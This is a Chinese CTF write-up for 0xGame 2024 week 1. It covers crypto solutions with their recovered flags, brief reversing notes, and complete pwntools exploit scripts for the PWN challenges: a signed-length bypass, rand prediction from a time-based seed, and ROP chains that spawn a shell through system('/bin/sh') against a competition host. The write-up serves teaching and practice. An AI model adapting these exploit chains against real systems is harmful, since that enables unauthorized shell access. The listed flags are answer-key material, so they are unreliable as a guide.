[0xGame 2024] week1
这一段时间新生赛比较多。
Crypto
Caesar Cipher
厨子一把梭
Code
编码,m0 + long_to_bytes(m1) + bytes.fromhex(m2)+b64decode(m3)
Code-Vigenere
维吉尼亚,通过头爆破key
# Vigenère key recovered by brute-forcing the known flag prefix (see writeup).
key = "owccl"
#0xGame{acb94092-e8bc-4963-88f6-4fcadbbfb6c7}
Number-Theory-CRT
RSA,N 非常小,只是 e 与 phi 有公因子 2:先按 e/2 解 RSA 得到 m^2,再在有限域上开平方根,对得到的各个根逐一尝试。
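# Number-Theory-CRT (Sage). gcd(e, phi) == 2, so RSA with d = e/2 ^ -1 mod phi
# recovers m^2 mod n; the plaintext is then a square root of m^2 over the
# two prime fields (Sage's roots() over Zmod(n) does the CRT for us).
# Fixes: the original spelled Sage's helper as `invese_mod` (NameError), and
# the extraction had fused several statements onto single lines.
n, e = (1022053332886345327, 294200073186305890)
c = 107033510346108389  # ciphertext as given in the writeup
factor(n)
# 970868179 * 1052721013
phi = 970868178 * 1052721012
d = inverse_mod(e//2, phi)   # e is even; e//2 is invertible mod phi
m2 = pow(c, d, n)            # c^d == m^2 (mod n)
P.<x> = PolynomialRing(Zmod(n))
f = x^2 - m2
res = f.roots(multiplicities=False)
# MD5 is a helper from the writeup's environment — presumably hashes the
# decimal string of the root; one of the four candidates is the flag body.
for i in res:
    MD5(int(i))
# outputs observed:
# '127016d0be858ef48a99723710ad4d49'
# 'f4107420d94cc7037114376d8566d4ef'
# '3932f6728585abbf751a212f69276d3e'
# '15820afdb9a129e89e40e57f40ff8de9'
#0xGame{127016d0be858ef48a99723710ad4d49}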
RSA-Baby
明显比上题还简单,连有限域开根号都免了
RSA-Easy
这俩题是不是重了。
PWN
test your nc
test your pwntools
stack overflow
略
positive
-1绕过加溢出
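from pwn import *

# positive: the length field is read as a signed value, so "-1" passes the
# bounds check (writeup: -1 绕过) and the following bytes overflow the stack
# buffer. Defensive takeaway: compare sizes as unsigned against a fixed
# upper bound before copying.
# Fix vs. the pasted original: `p = remote(...)` had been fused onto the
# context(...) line.
context(arch='amd64', log_level='debug')
p = remote('47.97.58.52', 40002)

# 0x38 bytes of padding, then the return address 0x401272 (target from the writeup).
pay = b'-1 ' + b'A'*0x38 + flat(0x401272)
p.sendafter(b':', pay)
p.interactive()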
find_me
ctypes 的用法:程序用当前时间作为随机数种子,而同一时刻全世界的时间戳是相同的,所以种子可以在本地复现。
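from pwn import *
from ctypes import cdll
import time

# find_me: the binary seeds libc rand() with the current time. Loading the
# same libc and calling srand()/rand() with the same seed reproduces the
# value locally. Defensive takeaway: a time-based seed is not a secret —
# anything security-relevant needs an unpredictable source (getrandom, secrets).
# Fixes vs. the pasted original: several statements had been swallowed into
# trailing comments (`seed = ...`, `p.recvuntil(...)`, two `p.send(...)` calls,
# `p.interactive()`), and the `from ctypes import *` star-import (which
# shadows names pwntools also exports) is narrowed to the one name used.
clibc = cdll.LoadLibrary("./libc.so.6")
context(arch='amd64', log_level='debug')
p = remote('47.97.58.52', 40003)
# p = process('./pwn')

# Reproduce srand(time(NULL)); rand() % 100 — assumes local and remote
# clocks agree to the second.
seed = int(time.time())
clibc.srand(seed)
v = clibc.rand() % 100
fid = 3 + v
print(f"{seed = :x} {fid = :x}")
# gdb.attach(p, "b*0x401339\nc")

p.recvuntil(b'Your turn!\n')
p.send(b'0 ')
p.send(str(fid).encode().ljust(4, b' '))  # read(3)
p.send(b'1 ')
p.send(b'0 ')  # write(1, ...)
p.interactive()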
where_is_my_binsh
都是栈溢出啊
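from pwn import *

# where_is_my_binsh: stack overflow into a short ROP chain calling
# system() via the PLT. The hard-coded gadget address implies a non-PIE
# binary; PIE plus a stack canary would break this chain as written.
# Fixes vs. the pasted original: `elf = ELF(...)`, `p = remote(...)` and the
# first `p.send(...)` had been fused onto neighbouring lines/comments.
context(arch='amd64', log_level='debug')
elf = ELF('./pwn')
pop_rdi = 0x401323  # pop rdi ; ret
p = remote('47.97.58.52', 40004)
# p = process('./pwn')

# The string is stored at 0x404090 (address from the writeup).
p.send(b'/bin/sh'.ljust(0x10, b'\0'))
# pop_rdi + 1 is presumably the bare `ret` after `pop rdi`, used for
# stack alignment before the system() call — verify in the disassembly.
p.send(b'A'*0x18 + flat(pop_rdi + 1, pop_rdi, 0x404090, elf.plt['system']))
p.interactive()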
ret2csu
栈溢出泄露libc再getshell
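from pwn import *

# ret2csu: stack overflow, first stage leaks the libc base via write@GOT
# and returns to main, second stage calls system() from the resolved libc.
# Defensive takeaway: full RELRO does not stop reading the GOT, but PIE,
# a stack canary and ASLR of the binary itself would each break the chain
# as written (gadget and data addresses are hard-coded).
# Fixes vs. the pasted original: `p = remote(...)` had been swallowed into
# the pop_rsi comment, and the first sendafter/last interactive calls were
# fused onto other lines.
context(arch='amd64', log_level='debug')
elf = ELF('./pwn')
libc = ELF('./libc.so.6')
pop_rdi = 0x00000000004013c3  # pop rdi ; ret
pop_rsi = 0x00000000004013c1  # pop rsi ; pop r15 ; ret
p = remote('47.97.58.52', 40005)
# p = process('./pwn')
# gdb.attach(p, "b*0x401357\nc")

# Stage 1: write(1, write@GOT, ...) then return to main.
p.sendafter(b"The little doll is tired, say goodnight to her~\n", b'/bin/sh'.ljust(0x10, b'\0'))
p.sendafter(
    b"What else do you want to do?\n\0",
    b'\0'*0x18 + flat(pop_rdi, 1, pop_rsi, elf.got['write'], 0, elf.plt['write'], elf.sym['main']),
)
p.recvuntil(b"Her sleeping face is lovely, right? Time to go.\n\0")
libc.address = u64(p.recv(8)) - libc.sym['write']
print(f"{libc.address = :x}")

# Stage 2: system("/bin/sh") with the string stored at 0x404090 (writeup address).
p.sendafter(b"The little doll is tired, say goodnight to her~\n", b'/bin/sh'.ljust(0x10, b'\0'))
p.sendafter(
    b"What else do you want to do?\n\0",
    b'\0'*0x18 + flat(pop_rdi, 0x404090, libc.sym['system']),
)
p.interactive()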
Rev
BabyBase
BinaryMaster
SignSign
前3略,IDA打开就知道了
Xor-Beginning
异或
Xor-Endian
同上